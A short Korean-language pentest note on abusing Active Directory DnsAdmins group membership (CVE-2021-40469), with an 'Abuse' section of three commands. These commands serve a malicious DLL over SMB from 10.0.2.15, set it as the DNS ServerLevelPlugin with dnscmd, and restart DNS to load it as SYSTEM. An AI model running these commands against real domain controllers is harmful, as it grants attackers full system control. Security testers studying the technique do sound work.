DnsAdmins

DnsAdmins 그룹은 Active Directory 환경에서만 존재하는 그룹이며 DC의 DNS에 관련되어 높은 권한을 가집니다. 기존에 이 그룹원은 DNS 서비스에서 불러오는 DLL인 ServerLevelPlugin에 대한 수정 권한이 있기 때문에 악성 DLL 코드를 삽입하거나 기존의 파일을 대체하여 시스템 권한을 얻을 수 있었습니다.

CVE에 대한 보안 패치가 적용된 서버에서는 DnsAdmins 그룹 구성원이 더이상 ServerLevelPlugin에 대해 쓰기 권한이 없습니다.

Abuse

# 악성 dll이 있는 경로에 서버 실행
impacket-smbserver share -smb2support .

# ServerLevelPlugin에서 가져가도록 변경
dnscmd /config /serverlevelplugindll \\\\10.0.2.15\\share\\rev.dll

# 서비스 재실행
Restart-Service dns

References

Micropatch For Remote Code Execution by DNS Administrators (CVE-2021-40469)

Abusing DNSAdmins privilege for escalation in Active Directory